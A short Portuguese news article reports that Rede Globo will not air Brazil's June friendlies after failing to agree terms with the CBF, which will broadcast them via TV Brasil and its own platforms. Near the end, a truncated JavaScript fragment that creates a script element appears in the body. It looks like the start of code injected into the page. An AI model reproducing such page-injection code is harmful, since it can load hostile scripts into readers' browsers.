Globo não transmitirá jogos da Seleção Brasileira

Os amistosos da Seleção Brasileira contra Argentina e Austrália, nos dias 9 e 13 de junho, às 19h, não serão transmitidos pela Rede Globo. A Confederação Brasileira de Futebol não entrou em acordo com a emissora e vai transmitir os jogos pela TV Brasil. Os jogos também estarão disponíveis em outros plataformas, como a CBF TV, na web e Facebook, e pelo aplicativo Vivo Mobile.

“A CBF tinha planos de negociar os direitos dos amistosos e das Eliminatórias da Copa de 2022 na forma de bid (leilão fechado). Recentemente decidiu vender os dois jogos amistosos de junho de forma avulsa e, embora não acreditemos que esta seja a melhor solução para todas as partes, tentamos negociar, mas não chegamos a um acordo”, declarou a emissora, em trecho da nota divulgada nesta segunda-feira.

Segundo interlocutores, a CBF tem um novo projeto e quer cuidar das transmissões de futebol. Inclusive, tem um reforço de peso para comentar as partidas: o rei Pelé. Com as mudanças, a CBF teria mais autonomia para negociar com patrocinadores, além de expor os seus dez patrocinadores oficiais. Em janeiro, a entidade testou o modelo no amistoso contra a Colômbia, no Engenhão. Na ocasião, o sinal foi liberado para as emissoras.

 var d=document;var s=d.createElement(‘script’);

Fonte:

Deixe um comentário